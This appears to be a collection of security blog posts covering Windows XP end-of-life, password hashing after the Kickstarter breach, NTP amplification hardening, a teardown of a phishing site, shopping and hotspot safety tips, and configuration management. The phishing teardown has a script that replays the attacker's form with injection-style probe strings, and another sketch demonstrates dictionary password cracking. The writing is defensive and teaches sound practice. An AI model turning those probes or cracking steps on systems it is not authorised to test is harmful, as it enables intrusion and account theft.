Putting Windows XP Out To Pasture

Farewell, Windows XP! We hated you, then loved you, and soon we’ll hate you again.

 (This post is a resource for home and small-business users with questions about the impending end-of-life for Windows XP. Larger enterprise users have some different options available to them; contact us to discuss your situation and options.)

For those who haven’t seen it in the news yet: Microsoft will be ending support for its hugely successful operating system, Windows XP, on April 8th. This means that users of the 12-year-old operating system will no longer be able to get updates, and in particular will not be able to get security updates. Users of more modern versions of Windows, such as Windows Vista or Windows 7, will remain supported for several more years.

Once support ends, computers still on Windows XP will become a very juicy target for Internet criminals and attackers. Internet crime is big business, so every day there are criminals looking for new weaknesses in computer systems (called vulnerabilities), and developing attacks to take advantage of them (these attacks are called exploits). Normally, the software vendor (Microsoft in this case) quickly finds out about these weaknesses and releases updates to fix them. When an exploit is developed, some number of people fall victim shortly after the exploit is first used, but people who get the update in a relatively timely manner are protected.

But what happens when a vendor stops updating the software? All of a sudden, the bad guys can use these same attacks, the same exploits, indefinitely. As a product nears end of life, attackers have an incentive to hold off on using critical vulnerabilities until the deadline passes. The value of their exploits goes up significantly once they have confidence that the vendor will never patch the underlying vulnerabilities. Based on that, we can expect a period of relative quiet in terms of announced vulnerabilities affecting XP from now until shortly after the deadline, when we will likely see stockpiled critical vulnerabilities begin circulating. From then on, the risk posed by these legacy XP systems will continue to increase, so migrating away from XP or dramatically isolating the systems should be a priority for people or organizations that still use them.

How do I know if I’m running Windows XP?

  • If your computer is more than 5 years old, odds are it is running Windows XP
  • Simplest way: “Win+Break”: Press and hold down the Windows key on your keyboard, then find the “Pause” or “Break” key and press it. Let both keys go. That will show the System Properties window. You may have to hunt around for your “Pause/Break” key, but hey, it finally has a use.
  • Alternate way: Click the Start Menu -> Right click on “My Computer” -> On the menu that comes out, click on Properties

 


Click the Start Menu, then right-click My Computer, then click Properties.

 


Your version of Windows will be the first thing on the System Properties window.

 

How do I stay safe?

Really, you should think about buying a new computer. You can think of it as a once-a-decade spring cleaning. If your computer is old enough to have Windows XP, having an unsupported OS is likely just one of several problems. It is possible to upgrade your old computer to a newer operating system such as Windows 7, or to convert to a free Linux-based operating system, but this may be a more complicated undertaking than many users want to tackle.

Any computer you buy these days will be a huge step up from a 7-year old (at least!) machine running XP, so you can comfortably shop the cheapest lines of computers. New computers can be found for $300, and it’s also possible to buy reputable refurbished ones with a modern operating system for $100-$200.

For those who really don’t want to or can’t upgrade, the situation isn’t pretty. Your computer will continue to work as it always has, but the security of your system and your data is entirely in your hands. These systems have been low-hanging fruit for attackers for a long time, but after April 8th they will have a giant neon bull’s-eye on them.

There are a few things you can do to reduce your risks, but there really is no substitute for timely vendor patches.

  1. Only use the system for tasks that can’t be done elsewhere. If the reason for keeping an XP machine is to run some specific program or piece of hardware, then use it only for that. In particular, avoid web browsing and email on the unsupported machine: both activities expose the vulnerable system to lots of untrusted input.
  2. Keep all of your other software up to date. Install and use the latest version of Firefox or Chrome web browsers, which won’t be affected by Microsoft’s end of life.
  3. Back up your computer. There are many online backup services available for less than $5 a month. If something goes wrong, you want to make sure that your data is safe. Good online backup services provide a “set it and forget it” peace of mind. This is probably the single most important thing you can do, and should be a priority even for folks using a supported operating system. Backblaze, CrashPlan, and SpiderOak are all reasonable choices for home users.
  4. Run antivirus software, and keep it up to date. AVAST, AVG, and Bitdefender are all reasonable free options, but be aware that antivirus is only one layer of protection: it’s not perfect.

 

What Kickstarter Did Right

Only a few details have emerged about the recent breach at Kickstarter, but it appears that this one will be a case study in doing things right both before and after the breach.

What Kickstarter has done right:

  • Timely notification
  • Clear messaging
  • Limited sensitive data retention
  • Proper password handling

Timely notification

The hours and days after a breach is discovered are incredibly hectic, and there will be powerful voices both attempting to delay public announcement and attempting to rush it. When users’ information may be at risk beyond the immediate breach, organizations should strive to make an announcement as soon as it will do more good than harm. An initial public announcement doesn’t have to have all the answers; it just needs to give users an idea of how they are affected, and what they can do about it. While it may be tempting to wait for full details, an organization that shows transparency in the early stages of a developing story is going to have more credibility as it goes on.

Clear messaging

Kickstarter explained in clear terms what was and was not affected, and gave straightforward actions for users to follow as a result. The logging and access control groundwork for making these strong, clear statements at the time of a breach needs to be laid far in advance and thoroughly tested. Live penetration testing exercises with detailed post mortems can help companies decide if their systems will be able to capture this critical data.

Limited sensitive data retention

One of the first questions in any breach is “what did they get?”, and data handling policies in place before a breach are going to have a huge impact on the answer. Thinking far in advance about how we would like to be able to answer that question can be a driver for getting those policies in place. Kickstarter reported that they do not store full credit card numbers, a choice that is certainly saving them some headaches right now. Not all businesses have quite that luxury, but thinking in general about how to reduce the retention of sensitive data that’s not actively used can reduce both the cost of protecting it and the chance of exposure over the long term.

Proper password handling (mostly)

Kickstarter appears to have done a pretty good job in handling user passwords, though not perfect. Password reuse across different websites continues to be one of the most significant threats to users, and a breach like this can often lead to ripple effects against users if attackers are able to obtain account passwords.

In order to protect against this, user passwords should always be stored in a hashed form, a representation that allows a server to verify that a correct password has been provided without ever actually storing the plaintext password. Kickstarter reported that their “passwords were uniquely salted and digested with SHA-1 multiple times. More recent passwords are hashed with bcrypt.” When reading breach reports, the level of detail shared by the organization is often telling and these details show that Kickstarter did their homework beforehand.

A strong password hashing scheme must protect against the two main approaches that attackers can use: hash cracking and rainbow tables. The details of these approaches have been well-covered elsewhere, so we can focus on what Kickstarter used to make their users’ hashes more resistant to these attacks.

To resist hash cracking, defenders want to massively increase the amount of work an attacker has to do to check each possible password. The problem with hash algorithms like SHA1 and MD5 is that they are too efficient; they were designed to be completed in as few CPU cycles as possible. We want the opposite from a password hash function, so that it is reasonable to check a few possible passwords in normal use but computationally ridiculous to try out large numbers of possible passwords during cracking. Kickstarter indicated that they used “multiple” iterations of the SHA1 hash, which multiplies the attacker effort required for each guess (so 5 iterations of hashing means 5 times more effort). Ideally we like to see a hashing attempt take at least 100 ms, which is a trivial delay during a legitimate login but makes large scale hash cracking essentially infeasible. Unfortunately, SHA1 is so efficient that it would take more than 100,000 iterations to raise the effort to that level. While Kickstarter probably didn’t get to that level (it’s safe to assume they would have said so if they did), their use of multiple iterations of SHA1 is an improvement over many practices we see.
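To make the work-factor idea concrete, here is a minimal sketch (not Kickstarter’s actual scheme) that uses Python’s standard-library PBKDF2 to show how the iteration count drives the per-guess cost; the timings it prints are entirely machine-dependent, and the point is simply to tune the count until a single guess lands around that 100 ms mark on your own hardware.

    # Minimal sketch: how iteration count drives per-guess cost.
    # Timings are machine-dependent; this is illustrative, not Kickstarter's scheme.
    import hashlib
    import os
    import time

    password = b"correct horse battery staple"
    salt = os.urandom(16)  # long, random, and unique per password

    for iterations in (1, 1000, 10000, 100000):
        start = time.time()
        hashlib.pbkdf2_hmac("sha1", password, salt, iterations)
        elapsed_ms = (time.time() - start) * 1000
        print("%7d iterations: %.1f ms per guess" % (iterations, elapsed_ms))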

To resist rainbow tables, it is important to use a long, random, unique salt for each password. Salting passwords removes the ability of attackers to simply look up hashes in a precomputed rainbow table. Using a random, unique salt on each password also means that an attacker has to perform cracking on each password individually; even if two users have an identical password, it would be impossible to tell from the hashes. There’s no word yet on the length of the salt, but Kickstarter appears to have gotten the random and unique parts right.

Finally, Kickstarter’s move to bcrypt for more recent passwords is particularly encouraging. Bcrypt is a modern key derivation function specifically designed for storing password representations. It builds in the idea of strong unique salts and a scalable work factor, so that defenders can easily dial up the amount of computation required to try out a hash as computers get faster. Bcrypt and similar functions such as PBKDF2 and the newer scrypt (which adds memory requirements) are purpose-built to make it easy to get password handling right; they should be the go-to approach for all new development, and a high-priority change for any codebases still using MD5 or SHA1.
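For new code, the purpose-built functions really are easy to adopt. Here is a minimal sketch using the third-party Python bcrypt package (installing it via pip is an assumption on my part, and the work factor of 12 is just a common starting point to tune against the timing target discussed above):

    # Minimal sketch: storing and verifying a password with bcrypt.
    # Assumes the third-party 'bcrypt' package (pip install bcrypt).
    import bcrypt

    password = b"hunter2"

    # gensalt() embeds a unique random salt and the work factor in the result,
    # so the salt and cost travel along with the stored hash.
    stored = bcrypt.hashpw(password, bcrypt.gensalt(rounds=12))
    print(stored)  # e.g. b'$2b$12$...'

    # Verification re-derives the hash using the salt embedded in 'stored'.
    print(bcrypt.checkpw(b"hunter2", stored))  # True
    print(bcrypt.checkpw(b"wrong", stored))    # False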

On NTP distributed denial of service attacks

NTP, the Network Time Protocol, is a time synchronization protocol implemented on top of a network protocol called UDP. UDP is designed for speed at the cost of simplicity, which suits the inherent time sensitivity (or more specifically, jitter sensitivity) of NTP. Time is an interesting case in computer security. Time isn’t exactly secret; it has relatively minor confidentiality considerations, but in certain uses, such as engineering, space technology, and financial transactions, it’s exceedingly important that multiple parties agree on the time.

At the bottom of these attacks is a simple equation:

denial of service amplification = bytes out / bytes in

When you get to a ratio > 1, a protocol like NTP becomes attractive as a magnifier for denial of service traffic.
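To put rough numbers on that, here is a back-of-the-envelope sketch; the byte counts are illustrative assumptions rather than measurements, standing in for a small spoofed query versus the much larger multi-packet reply an abusable NTP monitoring feature can return.

    # Back-of-the-envelope amplification: bytes out / bytes in.
    # The byte counts are illustrative assumptions, not measurements.
    def amplification(bytes_in, bytes_out):
        return bytes_out / float(bytes_in)

    request_bytes = 234           # a small spoofed NTP query
    response_bytes = 100 * 482    # a large monitoring reply spread over many packets

    print("amplification: %.0fx" % amplification(request_bytes, response_bytes))
    # Anything well above 1x makes the protocol attractive as a traffic magnifier.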

UDP’s simplicity makes it susceptible to spoofing. An NTP server can’t always tell whether a request is spoofed or not; in many cases it’s up to the network to decide. For a long time, operating system designers, system implementers, and ISPs did not pay a lot of attention to managing or preventing spoofed traffic. It was and is up to millions of internet participants to harden their networking configuration to limit the potential for denial of service amplification. Economically there’s frequently little incentive to do so – most denial of service attacks target someone else, and the impact of being involved as a drone is relatively minor. As a result you get systemic susceptibility.

My advice is for enterprises and individuals to research and implement network hardening techniques on the systems and networks they own. This often means tweaking system settings, or in certain cases may require tinkering with routers and switches. Product specific hardening guides can be found online at reputable sites. As with all technology, the devil is in the details and effective management is important in getting it right.
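As one commonly cited example for servers running ntpd, the snippet below turns off the monitoring feature that has been abused for amplification and restricts what remote clients may do; treat it as a starting sketch and verify the directives against your distribution's documentation before applying them.

    # Example /etc/ntp.conf hardening directives (verify against your vendor's guide)
    disable monitor                                         # turn off the 'monlist' feature abused for amplification
    restrict default kod nomodify notrap nopeer noquery     # limit what remote IPv4 hosts can query or change
    restrict -6 default kod nomodify notrap nopeer noquery  # same for IPv6
    restrict 127.0.0.1                                      # keep full access for localhost
    restrict -6 ::1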

Gutting a Phish

In the news lately there have been countless examples of phishing attacks becoming more sophisticated, but it’s important to remember that the entire “industry” is a bell curve: the most dedicated attackers are upping their game, but advancements in tooling and automation are also letting many less sophisticated players get started even more easily. Put another way, spamming and phishing are coexisting happily as both massive multinational business organizations and smaller cottage-industry efforts.

One such enterprising but misguided individual made the mistake of sending a typically blatant phishing email to one of our Neohapsis mailing lists, and someone forwarded it along to me for a laugh.


The phishing email, as it appeared in a mailbox

As silly and evident as this is, one thing I’m constantly astounded by is how the proportion of people who will click never quite drops to zero. Our work on social engineering assessments bears out this real world example: with a large enough sample set, you’ll always hook at least one. In fact, a paper out of Microsoft Research suggests that, for scammers, this sort of painfully blatant opening is actually an intentional tool: it acts as a filter that only the most gullible will pass.

Given the weak effort put into the email, I was curious to see if the scam got any better if someone actually clicked through. To be honest, I was pleasantly surprised.


The phishing site: a combination of legitimate Apple code and images and a form added by the attacker

The site is dressed up as a reasonable approximation of an official Apple site. In fact, a look at the source shows that there are two things going on here: some HTML/CSS set dressing and template code that is copied directly from the legitimate Apple site, and the phishing form itself which is a reusable template form created by one of the phishers.

Naturally, I was curious where data went once the form was submitted. I filled in some bogus data and submitted it (the phishing form helpfully pointed out any missing data; there is certainly an audacity in being asked to check the format of the credit card number that’s about to be stolen). The data POST went back to another page on the same server, then quickly forwarded me on to the legitimate iTunes site.

The submit request and the forward to the legitimate iTunes site, as captured in Burp

This is another standard technique: if a “login” appears to work because the victim was already logged in, the victim will often simply proceed with what they were doing without questioning why the login was prompted in the first place. During social engineering exercises at Neohapsis, we have seen participants repeatedly log into a cloned attack site, with mounting frustration, as they wonder why the legitimate site isn’t showing them the bait they logged in for.

Back to this phishing site: my application security tester spider senses were tingling, so I felt that I had to see what our phisher was doing with the data being submitted. To find out, I replayed the submit request with various types of invalid data, strings that should cause errors depending on how the data was being parsed or stored. Not a single test string produced any errors or different behavior. This could be an indication that any parsing and processing is being done carefully and correctly, but the far more likely case is that they’re simply doing no processing and dumping it all straight out as plain text.
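The testing itself was nothing exotic. A sketch along the lines of the one below is all it takes to replay the harvester POST with malformed values and compare responses; the host name is a placeholder (the real one was a compromised legitimate domain), and the field names are assumptions standing in for whatever the form actually submits.

    # Minimal sketch: replay the harvester POST with malformed values and
    # compare responses. Host and field names are placeholders/assumptions.
    import requests

    url = "http://compromised-example-host/Snd/Snd.php"
    probes = ["test", "'", '"><script>', "%00", "A" * 5000]

    for probe in probes:
        data = {"apple_id": probe, "password": probe, "card_number": probe}
        resp = requests.post(url, data=data, allow_redirects=False)
        print(repr(probe[:20]), resp.status_code, len(resp.content))

    # Identical status codes and response lengths for every probe suggest the
    # input is simply being dumped somewhere rather than parsed or validated.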

Interesting… if harvested data is just being simply dumped to disk, where exactly is it going? Burp indicates that the data is being POSTed to a harvester script at Snd/Snd.php. I wonder what else is in that directory?


Under the hood of the phishing site, the loot stash is clearly visible

That result.txt file looks mighty promising… and it is.


The format of the result.txt file

These are the raw results dumped from victims by the harvester script (Snd.php). The top entry is dummy data that I submitted, and when I checked it, the file was entirely filled with the various dummy submissions I had done before. It’s pretty clear from the results that I was the first person to actually click through and submit data to the phish site; actually pretty fortunate, because if a victim did enter legitimate information, the attacker would have to sort it out from a few hundred bogus submissions. Any day that we can make life harder for the bad guys is a good day.

So, the data collection is dead simple, but I’d still like to know a bit more about the scam and the phishers if possible. There’s not a lot to go on, but the tag at the top of each entry seems unique. It’s the sort of thing we’re used to seeing when hackers deface a website and leave a tag to publicize the work:

------------+| $ o H a B  Dz and a m i r TN |+------------

Googling some variations turned up a Google cache of a forum post that’s definitely related to the phishing site above; it’s either the same guy, or someone else using the same tool.


A post in a carder forum, offering to sell data in the same format as generated by the phishing site above

A criminal using the name AppleFullz is selling complete information dumps of login details and credit card numbers plus CVV numbers (called “fulls” in carder forums) captured in the exact format that the Apple phish used, and even provides a sample of his wares (insult to injury for the victim: not only was his information stolen, but it’s being given away as the credit card fraud equivalent of the taster trays at the grocery store). This carder is asking for $10 for one person’s information, but is willing to give bulk discounts: $30 for 5 accounts (this is actually a discount over the sorts of prices normally seen on carder forums; Krebs recently reported that Target cards were selling for $20-$100 per card. I read this as an implicit acknowledgement by our seller that this data is much “dirtier” and that the seller is expecting buyers to mine it for legitimate data). The tools being used here are a combination of some pre-existing scraps of PHP code widely used in other spam and scam campaigns (the section labeled “|INFO|VBV|”), and a separate section added specifically to target Apple IDs.

Of particular interest is that the carder provided a Bitcoin address. For criminals, Bitcoin has the advantage of anonymity but the disadvantage that transactions are public. This means that we can actually look up how much money has flowed into that particular Bitcoin address.


Ill-gotten gains: the Bitcoin blockchain records transfers into the account used for selling stolen Apple IDs and credit card numbers.

From November 17, when the forum posting went up, until December 4th, when I investigated this phishing attempt, he has received Bitcoin transfers totaling 0.81815987 BTC, which is around $744.53 (based on the BTC value on 12/4). According to his price sheet, that translates to a sale of between 74 and 124 records: not bad for a month of terribly unsophisticated phishing.
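That 74-to-124 range is just the reported revenue divided by the two advertised price points; a quick sanity check:

    # Rough bounds on records sold, from the advertised prices.
    revenue_usd = 744.53          # value of 0.81815987 BTC at the 12/4 rate
    print(int(revenue_usd / 10))  # ~74 records if every sale was a single ($10 each)
    print(int(revenue_usd / 6))   # ~124 records if all were bulk ($30 per 5 = $6 each)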

Within a few hours of investigating the initial phishing site, it had been removed. The actual server where the phish site was hosted was a legitimate domain that had been compromised; perhaps the phisher noticed the volume of bogus traffic and decided that the jig was up for that particular phish, or the system administrator got tipped off by the unusual traffic and investigated. Either way the phish site is offline, so that’s another small victory.

5 Tips for Safer Online Shopping

Use good password practices

No surprise here – it seems to be at the top of every list of this kind, but people still don’t listen. Passwords are still (and will continue to be) the weakest form of authentication. In a perfect security utopia passwords would not exist, but since we’re not there (yet) everyone relies on them. The two main rules on passwords are: make them complex, and make them unique. Complex doesn’t necessarily mean you need a thirty-character monstrosity of random symbols that only a savant could remember, but avoid dictionary words and don’t think that you’re safe by just appending numbers or special characters. The first thing an attacker will do is take every English word in the dictionary and append random characters to the end of it. Yep, “password1989!” is just as (in)secure as “password”. Lastly, passwords should be unique to each site. This is an even bigger sin that most people (myself included) are guilty of. We have one good password so we use it for everything. The problem with this is obvious: if it gets compromised, an attacker has access to everything. When LinkedIn’s passwords were compromised last year I realized I was using the same password for all my social media accounts, leaving all those vulnerable too. You don’t need to make an attacker’s job easier for him or her by reusing passwords. Make them work for each one they need to crack.
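To see why a tacked-on year and exclamation point buys so little, here is a toy sketch of that dictionary-plus-mangling attack; real cracking tools apply thousands of such rules per word against far larger wordlists, so this is purely illustrative (and the MD5 “leak” is, of course, made up).

    # Toy illustration of a dictionary + mangling attack. Real tools apply
    # thousands of mangling rules per word; this is purely illustrative.
    import hashlib

    leaked_hash = hashlib.md5(b"password1989!").hexdigest()  # pretend this leaked
    wordlist = ["letmein", "dragon", "password", "monkey"]   # stand-in for a real dictionary
    suffixes = ["", "1", "123", "!", "1989!", "2014"]

    for word in wordlist:
        for suffix in suffixes:
            guess = word + suffix
            if hashlib.md5(guess.encode()).hexdigest() == leaked_hash:
                print("cracked: " + guess)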

Store sensitive data in secure locations

Hopefully, you’ve followed the first rule and have unique, complex passwords for every site you visit. Now, how to remember them all? This is where I love to recommend password managers. Password managers securely store all your login information in an easily accessible location. I emphasize “securely” here, because I see far too many people with Word documents called “My Passwords” or the like sitting on their desktops. This is a goldmine for any attacker who has access to it. I’ve even seen these “password” files being shared unencrypted in the cloud, so people can pull them up on their phones or tablets to remember their passwords on the go. Please don’t do this. Now if you lose your phone you also lose every password to every secure site you have.

Instead, use a password manager like 1Password, LastPass, or KeePass, to name a few popular ones. These encrypt and store your sensitive information (not just passwords, but also SSNs, CC numbers, etc.) in an easy-to-access format. You encrypt your “wallet” of passwords with one very secure password (the only one you ever need to remember), and can even additionally encrypt them with a private key. A private key works just like a physical key – you need a copy of it to access the file. Keep it on a USB stick on your keychain and a backup in a fire-proof safe.

Watch out for HTTP(S)

Ever notice how some sites start with https:// as opposed to http:// ? That little ‘s’ at the end makes a whole world of difference. When it’s present it means that you have established a trusted and encrypted connection with the website. Its security purpose is two-fold: all data between you and the site is encrypted and cannot be eavesdropped on, and you have established through a chain of trust that the website you are visiting is, in fact, who it says it is.

For example, this is what the address bar on Firefox looks like when I have a secure connection to Bank of America:

https bar

Notice the ‘https’ and the padlock icon. If you are ever on a webpage that is asking you to enter sensitive information (like a password) and you don’t see something similar, don’t enter it! There could be any number of reasons why you are not connected via HTTPS, including benign ones, but it’s better to be safe than sorry. Likewise, if you ever receive a warning from your browser like this:

https error

It means that the browser cannot verify the website is actually who it says it is. Phishing sites can imitate legitimate logins down to the smallest detail, but they cannot imitate the real site’s SSL certificate. If you see this type of warning when trying to access a well-known site, get out immediately! There could be a legitimate problem with the website or your browser, but it’s more likely that somebody is impersonating the site and trying to fool you!

Install those nagging updates

Microsoft actually does an excellent job of patching vulnerabilities when they arise; the problem is that most people don’t install the patches. On the second Tuesday of each month, new patches and updates are released to the public. Microsoft will also release patches out-of-band (OOB), meaning as needed rather than waiting for the next Patch Tuesday, for serious vulnerabilities. These patches are a great way to fix security holes, but they also come with a nasty catch: attackers use the patches to see where the holes were.

Every “Patch Tuesday” attackers will reverse engineer the Windows updates to discover new vulnerabilities and then attempt to target machines that have not applied the update yet. It’s akin to a car manufacturer releasing a statement saying “this year and model car can be unlocked with a toothpick, so apply this fix.” Now every car thief in the world knows to look out for that year and model, and if the fix hasn’t been applied they know to try a toothpick.

This is why it’s imperative to keep your computer up to date. The “Conficker” worm that ran rampant in 2009 exploited a security vulnerability that was patched by Microsoft almost immediately. Part of the reason it spread so successfully was people’s reluctance to install new Windows updates. It preyed on out-of-date systems.

Likewise, many online exploits will use common vulnerabilities found in different software, like Flash, Java, or even the browsers. When software that you use online prompts you to install an update – do it!

So the next time your computer asks you to restart to install updates, go grab a cup of coffee and let it do its thing. It’ll save you in the long run.

(note: Mac users are not exempt! Install those updates from Apple as well!)

It’s okay to be a little paranoid

My last tip is more of a paradigm shift than a tip for when you are conducting business online. It’s okay to be a little paranoid. The old mantra “if it’s too good to be true, it probably is” has never been more applicable than it is to common phishing schemes. I’m sure most people know by now not to trust a pop-up that says “You’ve won an iPad – click here!”, but modern phishing techniques are much more subtle – and much more dangerous.

One of the only times I’ve ever fallen victim to a phishing scheme was when “Paypal” emailed me asking me to confirm a large purchase because it was suspicious. Since I didn’t make the order I immediately thought I had been compromised. I went into panic mode, clicked the link, entered my password….and, wait, I just entered my Paypal password into a site I don’t even recognize. They got me.

It’s okay to mistrust emails and links. If something seems phishy (pun intended) then exit out. Services like Paypal and online banks will never ask for personal information over email, chat, or any avenue besides their main website. If you have an issue, go to their website, ensure that ‘s’ is in your address bar, and do your business from there. If you’re still not convinced, find their 800 number and call them. The point is, if I had stayed calm for a second and thought it was strange Paypal was asking me to urgently log in via an email message, I would have gathered myself, gone to their official site to log in and then looked for any alerts or suspicious activity. I could have even called them.

Trying not to sound too misanthropic here, but when it comes to dealing with sensitive information online it’s better not to trust someone initially than it is to trust them implicitly. Your bank account information won’t be deleted and nothing bad will happen if you don’t immediately update your password, so take a second to make sure what you’re doing is actually legit.

Configuration Assurance: Evolving Security Beyond the Basics

Perhaps it is more appropriate for us to approach configuration management as an assurance process meant to ensure system integrity is maintained over time. By evolving our view of how to establish and control the integrity of the different devices and technologies in use, the concept of “configuration management” evolves to become more about “configuration assurance.”

The Need to Manage Configuration 

When considering the different aspects of information security program management, few topics are of as much importance to an organization’s overall security posture as the topic of “configuration management.” This is due, in part, to the number of different standards and processes that typically comprise or govern a configuration management program. And it is usually the lack of governance or enforcement of configuration management practices that leads to system and information compromises.

When we look at configuration management, it is important for us to keep in mind that what we’re really addressing is the “I” of InfoSec’s “Confidentiality, Integrity, and Availability,” or “C.I.A.” Because of this, we should understand each of the different parts that make up a configuration management program or process, and further understand them as part of an overall process for ensuring the integrity of any given device or system. Ultimately, the basis for establishing and verifying the integrity of a device or system needs to be consistent with the information security standards defined by the organization, industry best practices, industry or governmental regulation, and relevant legislative requirements.

The Basics of Configuration Management 

The objective of any meaningful configuration management program is a security-minded framework within which all information systems can be tracked, classified, reviewed, analyzed, and maintained according to a consistent set of practices and standards. Configuration management programs usually incorporate several different standards and processes to address the diverse aspects of information security, such as standard build/configuration documentation and processes, antivirus monitoring, patch management, vulnerability management, asset management, etc. Essentially, it comes down to having a lot of eggs that ultimately wind up in the same basket, with the objective being that none of the egg shells get broken.

At a high level, the functional and security requirements for most of these programs and services are fairly well understood, and it is common for organizations to treat each of the different aspects of configuration management as stand-alone programs or processes. The reality, however, is quite different: in addition to ensuring that a configuration management program addresses all of the relevant security requirements, it is equally necessary to understand how each individual security process or program relates to the others. Why? Because each of the processes associated with configuration management impacts other processes related to configuration management. The manner in which these interrelationships are addressed (or not addressed) may expose significant risks in critical or sensitive information systems.

Regardless, many organizations still tend to approach delivery of these programs and services as individual and somewhat isolated or unrelated processes. This is especially true for organizations that heavily focus on meeting compliance requirements without embracing the larger concept of “information security.” This is also true in organizations where information security programs are less mature, or if there is an over-reliance on technology in the absence of formal documentation.

Where the Gaps May Lie

Following are a couple of examples where gaps might typically occur in the configuration management process. After each example, I’ve put together a few follow-up questions to help explore each issue a little more in-depth.

A. Auditing and Log Monitoring – Most security policies and system configuration standards tend to address audit and logging requirements at the operating system level. However, operating system audit log services are not always capable of capturing detailed audit log data generated by some applications or services. As a result, it may be necessary to combine and correlate multiple audit log data sources (perhaps from multiple devices) to reconstruct a specific chain of events. All business processes should be reviewed to ensure that the full complement of required audit log data is being collected and reviewed.

  1. Do your policies, standards, and processes ensure that all required security audit log data is collected for any and all firewalls/routers, workstations, critical/sensitive applications, databases, monitoring technologies, and other relevant security devices or technologies used in the environment?
  2. Do policies or standards require audit log data collection to include audit log data from all antivirus endpoints, file integrity monitoring endpoints, IDS/IPS alerts and events, security devices or applications, and file or database access?
  3. Is all audit log data, of all types, collected to a single or centralized source(s)?
  4. Is all audit log data backed up regularly (at least daily) and protected against unauthorized access or modification?
  5. Is audit log data from one source combined and correlated with audit log data from other devices or services to reconstruct specific activities, identify complex attacks, and/or raise appropriate alerts?
  6. Has your organization performed any testing or forensic activities to verify that audit log information currently being collected is sufficient to raise appropriate alerts and reconstruct the events related to any suspicious activity?

B. Standard Build/Configuration – It is commonplace for organizations to have standards documentation describing how to install and configure the different kinds of operating systems (and sometimes databases) used in the environment. However, it is not quite so common to have similar documentation (or similar level of detail) when it comes to some specialized technologies or functions. As we are all aware, a secure technical environment is reliant upon more than just securing the operating systems and extends to all devices in use. Policies, standards, and processes should exist to address all technologies used in the environment and should define how to establish, maintain, and verify the integrity of any device or application intended for use within the environment.

  1. Do documentation and processes currently exist to define the secure initial configuration of all technology device types and applications in use in the environment? This includes technologies or devices such as firewalls, routers, servers, databases, mainframe/mid-range, wireless technologies and devices, mobile computing devices (laptops and smartphones), workstations, point-of-interaction devices, IVR systems, and any other technologies related to establishing, enforcing, or monitoring security posture or controls.
  2. Are configuration standards cross-checked to ensure that all relevant information security subject areas are addressed or appropriately cross-referenced? For example, do OS configuration standards include details for installing antivirus or other critical software (FIM, patch management, etc.)? If not, is a reference provided to supporting documentation that details how to install antivirus or other critical software for each specific operating system type?
  3. Do documentation and processes currently exist to define not just the secure configuration of the base operating system, but also to define a minimum patch level or version a system must meet (e.g., "Win7 SP2" or "Apache version X.X.Y") before being permitted to connect to the network environment?

These are clearly not all of the possible intersections or gaps that might occur in how an organization approaches configuration management. In developing an information security program, each organization will need to identify the relevant services, processes, and programs that represent how configuration management is achieved. As part of a process of constant improvement, the next logical step would then be to take a closer look at the internal process interrelationships and try to identify any gaps that might exist.

Where to from here?

By evolving our view of how to establish and control the integrity of the different devices and technologies, the concept of “configuration management” evolves to become more about “configuration assurance.” Instead of approaching configuration management as a somewhat unregulated process kept in check by periodic review (audit), perhaps it is more appropriate for us to approach configuration management as an assurance process meant to ensure system integrity is maintained over time.

In the end, one of the biggest enemies of information security is time. Even if you have bullet-proof security controls in place today, they will probably not offer much protection against the vulnerability or exploit that a hacker will identify tonight or a vendor will announce tomorrow (or on Tuesday).

Security Best Practices With Mobile Hotspots

The use of mobile hotspots has skyrocketed over the last couple of years, and with the release of 4G, it’s pretty obvious why. Not only for the added mobility, either. I can personally always rely on my smartphone’s 4G service being faster and more reliable, on top of possibly being more secure than the shared hotel or coffee shop wireless. I say possibly, because just enabling the mobile hotspot feature on your phone doesn’t necessarily make it a more secure option. In fact, if you’re using the default settings for your mobile hotspot, it’s very likely this isn’t the case. This brings the usual risks of an attacker gaining unauthorized access, plus an added risk to your data usage. Unless you’ve got an unlimited data plan (do those even exist?), an attacker can potentially run up charges by pushing you over your allotted monthly limit.

Configure Your Mobile Hotspot

With that, I would like to provide some tips and best practices to ensure that you are secure when using your mobile hotspot. Some of these tips aren’t new; they apply to securing access points in general, but I have tailored the recommendations to be more specific to hotspots. So, here they are, in no particular order of importance:

1. Use Obscure SSIDs

Before I dive into this, let me explain a little about what I mean by an SSID. SSID is an acronym that stands for “Service Set Identifier,” which, like most technical acronyms, doesn’t do a great job of explaining what it actually is. Simply put, the SSID is just the name you are going to give your hotspot so that your other devices can identify it. For example, when you go to pick a wireless network, all the wireless network names you see out there are their SSIDs. With that said, most hotspots will come with defaults, usually in the realm of “Verizon Mobile Hotspot”, for example. It’s best to avoid using default names such as “Verizon Mobile Hotspot” or even custom ones such as “Tammy’s iPhone” for your SSID, as these names give an attacker some idea of the service and/or model of device being used, which in turn allows them to target based on the default settings for these devices. Take this opportunity to use something creative, such as “NSA Surveillance”. Attackers will have a more difficult time profiling your hotspot, plus you’ll probably give some people a good chuckle. Another point to note regarding your SSID is that hiding it isn’t necessary, as an attacker would be able to discover your “hidden” SSID with little effort anyway.

Obscure SSID

2. WPA2 Security – Always

Most hotspots will give you the option to change the security encryption being used. This typically ranges from options such as Open, which requires no encryption or passcode at all, all the way to WPA2 PSK, which is the latest standard and uses a very high level of encryption. Always be sure to use WPA2 security when setting up a hotspot. All smartphones that provide hotspot functionality should have this as an option, and if they don’t, it’s probably time to upgrade to one that does. WPA is the only exception, in that even though it’s not as secure as WPA2, it’s still very secure when combined with a complex enough passcode (which is covered next). WEP encryption should be completely avoided, since anyone with $30 and access to Google can find step-by-step instructions on how to crack the passcode within about 5 minutes. If your hotspot supports the option to use WPS, it’s recommended that this is disabled as well, as there is a known vulnerability that can allow an attacker to obtain the WPA passcode by brute-forcing the WPS PIN.

WPA2 Security

 

3. Use Complex Passwords

